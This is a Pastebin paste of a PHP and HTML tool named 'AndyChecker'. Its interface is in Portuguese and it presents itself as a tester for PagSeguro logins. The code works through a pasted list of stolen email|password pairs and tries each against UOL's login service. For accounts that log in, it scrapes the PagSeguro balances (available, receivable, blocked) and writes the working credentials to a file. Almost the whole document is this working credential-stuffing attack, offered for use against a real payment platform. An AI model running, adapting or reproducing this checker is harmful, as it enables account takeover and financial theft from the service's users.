Advertisement
Guest User

z3#z4Zz5

a guest
Oct 27th, 2016
1,301
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.12 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3.  
  4. <head>
  5. <meta charset="utf-8" />
  6. <title>[@AndyChecker] - Copyright © 2016 AndyChecker Inc.</title>
  7. <link rel="icon" href="path/images/favicon.ico" type="image/x-icon" />
  8. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
  9. <link href="/path/css/bootstrap.css" rel='stylesheet' type='text/css'>
  10. <script src="/path/js/custom.js"></script>
  11. <link href="/path/css/animate.css" rel='stylesheet' type='text/css'>
  12. <link href='/path/css/explicitchk.css' rel='stylesheet' type='text/css'>
  13. <link rel="stylesheet" href="/path/css/font-awesome.min.css">
  14. <link rel="shortcut icon" type="image/png" href="img/Anonymous.png"/>
  15.  
  16. <body>
  17. <body background="/fundo.jpg">
  18. <center>
  19. <div class="alert alert-success"><small><h3><font color="white">Testador de Logins Pagseguro: (100%) </font></h3></small></div>
  20. </center>
  21. <center><img src="http://model39.radiomaria.org/Data/Sites/45/pagseguro.png" width="369" height="142"></center>
  22. <br>
  23. <center><h5>O Checker reconhece apenas logins válidos <br> logins inválidos serão descartados da lista.</h5></center>
  24. <br>
  25. </center>
  26. </body>
  27.  
  28. <?php
  29.  
  30. $sock = '';
  31.  
  32. error_reporting(0);
  33.  
  34.  
  35.  
  36. function getStr($string, $start, $end) {
  37.  
  38. $str = explode($start, $string);
  39.  
  40. $str = explode($end, $str[1]);
  41.  
  42. return $str[0];
  43.  
  44. }
  45.  
  46.  
  47.  
  48. class cURL {
  49.  
  50.  
  51.  
  52. var $callback = false;
  53.  
  54.  
  55.  
  56. function setCallback($func_name) {
  57.  
  58. $this->callback = $func_name;
  59.  
  60. }
  61.  
  62.  
  63.  
  64. function doRequest($method, $url) {
  65.  
  66. $ch = curl_init();
  67.  
  68. global $email, $pwd,$token,$pag;
  69.  
  70. if ($pag)
  71. {
  72. curl_setopt($ch, CURLOPT_URL, $url);
  73. curl_setopt($ch, CURLOPT_HEADER, 1);
  74. curl_setopt($ch, CURLOPT_NOBODY, false);
  75. curl_setopt($ch, CURLOPT_ENCODING, 'gzip');
  76. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  77. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  78. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  79. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  80. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  81. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  82. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/pagseguro.txt');
  83. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/pagseguro.txt');
  84. curl_setopt($ch, CURLOPT_REFERER, 'https://pagseguro.uol.com.br/login.jhtml');
  85. curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  86. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  87.  
  88. if ($method == 'POST') {
  89.  
  90. curl_setopt($ch, CURLOPT_POST, 1);
  91.  
  92. curl_setopt($ch, CURLOPT_POSTFIELDS, 'dest=+REDIR%7Chttps%3A%2F%2Fpagseguro.uol.com.br%2Ftransaction%2Fsearch.jhtml&skin=&acsrfToken='.$token.'&user='.$email.'&pass='.$pwd.'');
  93.  
  94. }
  95. }
  96. else
  97. {
  98.  
  99. curl_setopt($ch, CURLOPT_URL, $url);
  100. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
  101. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  102. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  103. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  104. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  105. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  106. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  107. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd() . '/acessocard.txt');
  108. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd() . '/acessocard.txt');
  109. curl_setopt($ch, CURLOPT_REFERER, 'https://acesso.uol.com.br/login.html');
  110. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  111.  
  112. if ($method == 'POST') {
  113.  
  114. curl_setopt($ch, CURLOPT_POST, 1);
  115. curl_setopt($ch, CURLOPT_POSTFIELDS, 'user='.$email.'&pass='.$pwd.'&skin=default&dest=&deviceId='.$token.'');
  116.  
  117. }
  118. }
  119. $data = curl_exec($ch);
  120.  
  121. curl_close($ch);
  122.  
  123. if ($data) {
  124.  
  125. if ($this->callback) {
  126.  
  127. $callback = $this->callback;
  128.  
  129. $this->callback = false;
  130.  
  131. return call_user_func($callback, $data);
  132.  
  133. } else {
  134.  
  135. return $data;
  136.  
  137. }
  138.  
  139. } else {
  140.  
  141. return curl_error($ch);
  142.  
  143. }
  144.  
  145. }
  146.  
  147.  
  148.  
  149. function get($url) {
  150.  
  151. return $this->doRequest('GET', $url, 'NULL');
  152.  
  153. }
  154.  
  155.  
  156.  
  157. function post($url) {
  158.  
  159. return $this->doRequest('POST', $url);
  160.  
  161. }
  162.  
  163.  
  164.  
  165. }
  166.  
  167.  
  168.  
  169. echo '<div id="page-content">
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176. <DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  177.  
  178. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  179.  
  180.  
  181.  
  182.  
  183.  
  184. <script type="text/javascript">
  185. function pushPaypalDie(str){
  186. document.getElementById(\'listPaypalDie\').innerHTML += \'<div>\' + str + \'</div>\';
  187. }
  188. function pushPaypal(str){
  189.  
  190. document.getElementById(\'listPaypal\').innerHTML += \'<div>\' + str + \'</div>\';
  191.  
  192. }
  193.  
  194. function pushWrongFormat(str){
  195.  
  196. document.getElementById(\'listWrongFormat\').innerHTML += \'<div>\' + str + \'</div>\';
  197.  
  198. }
  199.  
  200. </script>
  201.  
  202.  
  203. <body><Center>
  204.  
  205. <div class="main-content">
  206. </div>
  207. <form method="post">
  208. <div align="center"><textarea name="mp" rows="15" placeholder=" E-mail|Senha" style="width:60%">';
  209.  
  210. if (isset($_POST['btn-submit']))
  211.  
  212. echo $_POST['mp'];
  213.  
  214. else
  215.  
  216. ;
  217.  
  218. echo '</textarea>
  219. <div class="form-inline">
  220. <center><button type="submit" name="limpar" value="Limpar" onclick="limpar()" class="fcbtn btn btn-success btn-outline btn-1e btn-squared">Limpar</button></center>
  221. </table>
  222. <center><input type="text" style="height: 40px; width: 55px; text-align: center;" class="form-control" name="delim" value="';
  223.  
  224. if (isset($_POST['btn-submit']))
  225.  
  226. echo $_POST['delim'];
  227.  
  228. else
  229.  
  230. echo '|';
  231. ;
  232.  
  233. echo '" size="1" /><input type="hidden" name="mail" value="';
  234.  
  235. if (isset($_POST['btn-submit']))
  236.  
  237. echo $_POST['mail'];
  238.  
  239. else
  240.  
  241. echo 0;
  242.  
  243. ;
  244.  
  245. echo '" size="1" /><input type="hidden" name="pwd" value="';
  246.  
  247. if (isset($_POST['btn-submit']))
  248.  
  249. echo $_POST['pwd'];
  250.  
  251. else
  252.  
  253. echo 1;
  254. ;
  255.  
  256. echo '" size="1" />&nbsp;
  257. <center><input type="submit" class="fcbtn btn btn-success btn-outline btn-1e btn-squared" value="Iniciar" name="btn-submit">
  258.  
  259. </div>
  260.  
  261. </form>
  262.  
  263. ';
  264.  
  265. set_time_limit(0);
  266.  
  267.  
  268.  
  269. function fetch_value($str, $find_start, $find_end) {
  270.  
  271. $start = strpos($str, $find_start);
  272.  
  273. if ($start === false) {
  274.  
  275. return "";
  276.  
  277. }
  278.  
  279. $length = strlen($find_start);
  280.  
  281. $end = strpos(substr($str, $start + $length), $find_end);
  282.  
  283. return trim(substr($str, $start + $length, $end));
  284.  
  285. }
  286.  
  287.  
  288.  
  289. function fetch_value_notrim($str, $find_start, $find_end) {
  290.  
  291. $start = strpos($str, $find_start);
  292.  
  293. if ($start === false) {
  294.  
  295. return "";
  296.  
  297. }
  298.  
  299. $length = strlen($find_start);
  300.  
  301. $end = strpos(substr($str, $start + $length), $find_end);
  302.  
  303. return substr($str, $start + $length, $end);
  304.  
  305. }
  306.  
  307.  
  308.  
  309. $dir = dirname(__FILE__);
  310.  
  311. $config['cookie_file'] = $dir . '/cookies/' . md5($_SERVER['REMOTE_ADDR']) . '.txt';
  312.  
  313. if (!file_exists($config['cookie_file'])) {
  314.  
  315. $fp = @fopen($config['cookie_file'], 'w');
  316.  
  317. @fclose($fp);
  318.  
  319. }
  320.  
  321. $zzz = "";
  322.  
  323. $live = array();
  324.  
  325.  
  326.  
  327. function get($list) {
  328.  
  329. preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/", $list, $socks);
  330.  
  331. return $socks[0];
  332.  
  333. }
  334.  
  335.  
  336.  
  337. function delete_cookies() {
  338.  
  339. global $config;
  340.  
  341. $fp = @fopen($config['cookie_file'], 'w');
  342.  
  343. @fclose($fp);
  344.  
  345. }
  346.  
  347.  
  348.  
  349. function xflush() {
  350.  
  351. static $output_handler = null;
  352.  
  353. if ($output_handler === null) {
  354.  
  355. $output_handler = @ini_get('output_handler');
  356.  
  357. }
  358.  
  359.  
  360.  
  361. if ($output_handler == 'ob_gzhandler') {
  362.  
  363. return;
  364.  
  365. }
  366.  
  367.  
  368.  
  369. flush();
  370.  
  371. if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false) {
  372.  
  373. @ob_flush();
  374.  
  375. } else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE) {
  376.  
  377. @ob_end_flush();
  378.  
  379. @ob_start();
  380.  
  381. }
  382.  
  383. }
  384.  
  385.  
  386.  
  387. function curl_grab_page($site, $proxy, $proxystatus) {
  388.  
  389. $chss = curl_init();
  390.  
  391. curl_setopt($chss, CURLOPT_RETURNTRANSFER, TRUE);
  392.  
  393. if ($proxystatus == 'on') {
  394.  
  395. curl_setopt($chss, CURLOPT_SSL_VERIFYHOST, FALSE);
  396.  
  397. curl_setopt($chss, CURLOPT_HTTPPROXYTUNNEL, TRUE);
  398.  
  399. curl_setopt($chss, CURLOPT_PROXY, $proxy);
  400.  
  401. }
  402.  
  403. curl_setopt($chss, CURLOPT_COOKIEFILE, "cookie.txt");
  404.  
  405. curl_setopt($chss, CURLOPT_URL, $site);
  406.  
  407. return curl_exec($chss);
  408.  
  409. curl_close($chss);
  410.  
  411. }
  412.  
  413.  
  414.  
  415. function display($str) {
  416.  
  417. echo '<div>' . $str . '</div>';
  418.  
  419. xflush();
  420.  
  421. }
  422.  
  423.  
  424.  
  425. //function pushSockDie($str) {
  426.  
  427. // echo '<script type="text/javascript">pushSockDie(\'' . $str . '\');</script>';
  428.  
  429. // xflush();
  430.  
  431. //}
  432.  
  433. function pushPaypalDie($str) {
  434.  
  435. echo '<script type="text/javascript">pushPaypalDie(\'' . $str . '\');</script>';
  436.  
  437. file_put_contents('api/accountsdead.txt', $str . PHP_EOL, FILE_APPEND);
  438.  
  439. xflush();
  440.  
  441. }
  442.  
  443.  
  444.  
  445. function pushPaypal($str) {
  446.  
  447. echo '<script type="text/javascript">pushPaypal(\'' . $str . '\');</script>';
  448.  
  449. file_put_contents('api/accounts.txt', $str . PHP_EOL, FILE_APPEND);
  450.  
  451. xflush();
  452.  
  453. }
  454.  
  455.  
  456.  
  457. function pushWrongFormat($str) {
  458.  
  459. echo '<script type="text/javascript">pushWrongFormat(\'' . $str . '\');</script>';
  460.  
  461. xflush();
  462.  
  463. }
  464.  
  465. if (isset($_POST['btn-submit'])) {
  466. $linhas = explode("\n", $_POST['mp']);
  467.  
  468. $conta = count($linhas);
  469. echo '
  470.  
  471. <center>
  472. <p class="fcbtn btn btn-success btn-outline btn-1e btn-squared">Lista Carregada ('.$conta.') </p>
  473. <div class="panel panel-green"><br>
  474. <div class="alert alert-success"><small>✔ Aprovadas</small></div>
  475. <legend class="tvmit_live"><br/><div id="listPaypal"></div></legend><br>
  476. <div class="alert alert-danger"><small><font color="white">✘ Reprovadas</font></small></div>
  477. <legend class="tvmit_die"><br/><div id="listPaypalDie"></div></legend>
  478. </div>
  479. </div>
  480. </div>
  481. </div>
  482.  
  483. ';
  484.  
  485. xflush();
  486.  
  487. $emails = explode("\n", trim($_POST['mp']));
  488.  
  489. $eCount = count($emails);
  490.  
  491. $failed = $live = $uncheck = array();
  492.  
  493. $checked = 0;
  494.  
  495. if (!count($emails)) {
  496.  
  497. // continue;
  498.  
  499. }
  500.  
  501. delete_cookies();
  502.  
  503. //$sockClear = isSockClear();
  504.  
  505. //if ($sockClear != 1) {
  506.  
  507. //pushSockDie('[<font color="#FF0000">' . $sock . '</font>]');
  508.  
  509. //continue;
  510.  
  511. //}
  512.  
  513.  
  514.  
  515.  
  516.  
  517.  
  518.  
  519.  
  520.  
  521. function mask($val, $mask)
  522.  
  523. {
  524.  
  525. $maskared = '';
  526.  
  527. $k = 0;
  528.  
  529. for($i = 0; $i<=strlen($mask)-1; $i++)
  530.  
  531. {
  532.  
  533. if($mask[$i] == '#')
  534.  
  535. {
  536.  
  537. if(isset($val[$k]))
  538.  
  539. $maskared .= $val[$k++];
  540.  
  541. }
  542.  
  543. else
  544.  
  545. {
  546.  
  547. if(isset($mask[$i]))
  548.  
  549. $maskared .= $mask[$i];
  550.  
  551. }
  552.  
  553. }
  554.  
  555. return $maskared;
  556.  
  557. }
  558.  
  559.  
  560.  
  561.  
  562.  
  563. foreach ($emails AS $k => $line) {
  564.  
  565. $info = explode($_POST['delim'], $line);
  566.  
  567. $email = trim($info["{$_POST['mail']}"]);
  568.  
  569. $pwd = trim($info["{$_POST['pwd']}"]);
  570.  
  571. if (strlen($email) < 14 || strlen($pwd) < 2) {
  572.  
  573. unset($emails[$k]);
  574.  
  575. pushWrongFormat($email . ' | ' . $pwd);
  576.  
  577. continue;
  578.  
  579. }
  580.  
  581. //if ($failed[$sock] > 4)
  582.  
  583. // continue;
  584.  
  585. //DELETAR COOKIES
  586.  
  587. if (file_exists(getcwd() . '/acessocard.txt')) {
  588.  
  589. unlink(getcwd() . '/acessocard.txt');
  590.  
  591. }
  592.  
  593. //FIM COOKIES
  594.  
  595. //CHAMADAS DE TOKEN E POST
  596.  
  597.  
  598.  
  599.  
  600.  
  601. $c = new cURL();
  602.  
  603.  
  604.  
  605. $d = $c->post("https://acesso.uol.com.br/login.html");
  606.  
  607. $checked++;
  608.  
  609.  
  610. if (stristr($d,'limite') !== false) {
  611.  
  612.  
  613. $pag = true;
  614. $a1 = new cURL();
  615. $b1 = $a1->get("https://pagseguro.uol.com.br/login.jhtml");
  616. $token = getStr($b1,'type="hidden" name="acsrfToken" value="','"');
  617. $c1 = new cURL();
  618. $d1 = $c1->post("https://pagseguro.uol.com.br/login.jhtml");
  619. $token;
  620.  
  621.  
  622. $xyz = "<b style=\"color:#00FF7F\">✔ </b>$email | $pwd ";
  623.  
  624.  
  625.  
  626. $live[] = $xyz;
  627.  
  628.  
  629.  
  630. unset($emails[$k]);
  631.  
  632. // echo '<textarea rows="40 cols="50">
  633. // '.$d1.'
  634. // </textarea>';
  635.  
  636.  
  637. if (stripos($d1, "EXTRATO") !== false)
  638. {
  639. $saldo = getStr($d1,'id="accountBalance" class="positive">','</dd>'); // Saldo disponível
  640. $receber = getStr($d1,'id="accountEscrow" class="neutral">','</dd>'); // Receber
  641. $bloqueado = getStr($d1,'id="accountBlocked" class="neutral">','</dd>'); // VaLOR BLOCK
  642. // Alone
  643. $available = str_replace(' \r\n','',$saldo);
  644. $receive = str_replace('\n','',$receber);
  645. $blocked = str_replace('\r\n','',$bloqueado);
  646. $status = str_replace('\r\n','',$estado);
  647. $xyz = "<h5><p><center><b style=\"color:#00FF7F\">✔ Live </b><b style=\"color:#00FFFF\"> |</b><b style=\"color:white\"> $email <b style=\"color:#00FFFF\">|</b> $pwd </b><b style=\"color:#00FFFF\"> |</b><b style=\"color:white\"> Saldo Disponivel: </b> <b style=\"color:#00FF7F\"> $available </b><b style=\"color:#00FFFF\"> |</b><b style=\"color:white\"> Receber: </b> <b style=\"color:#00FF7F\"> $receive </b><b style=\"color:#00FFFF\"> |</b><b style=\"color:white\"> Bloqueado: </b> <b style=\"color:red\"> $blocked </b> <b style=\"color:#00FF7F\">| @AndyCHK </b></p></center></h5>";
  648. $live[] = $xyz;
  649. unset($emails[$k]);
  650. pushPaypal($xyz);
  651. $pag = FALSE;
  652. }
  653. else
  654. {
  655. pushPaypalDie("<h5><b style=\"color:red\">✘ Die </b><b style=\"color:#00FFFF\"> | </b><b style=\"color:white\"> $email <b style=\"color:#00FFFF\">|</b> $pwd </b><b style=\"color:#00FFFF\"> | </b><b style=\"color:#00FF7F\"> @AndyCHK </b></h5>");
  656. unset($emails[$k]);
  657. $pag = FALSE;
  658. }
  659.  
  660.  
  661.  
  662.  
  663.  
  664. }
  665.  
  666.  
  667.  
  668. else{
  669.  
  670.  
  671.  
  672.  
  673.  
  674.  
  675.  
  676. pushPaypalDie("<h5><b style=\"color:red\">✘ Die </b><b style=\"color:#00FFFF\"> | </b><b style=\"color:white\"> $email <b style=\"color:#00FFFF\">|</b> $pwd </b><b style=\"color:#00FFFF\"> | </b><b style=\"color:#00FF7F\"> @AndyCHK </b></h5>");
  677.  
  678.  
  679.  
  680.  
  681.  
  682.  
  683.  
  684.  
  685.  
  686.  
  687.  
  688. unset($emails[$k]);
  689.  
  690. }
  691.  
  692. }
  693.  
  694. }
  695. ?>
  696. <center><iframe width="0" height="0" src="/musica.mp3" frameborder="0" allowfullscreen></iframe></center>
  697. </center>
  698. </body>
  699. </html>
  700. <center><div class="alert alert-success"><small><h5><font color="white">Copyright © 2016 AndyChecker Inc.</font></h5></small></div></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement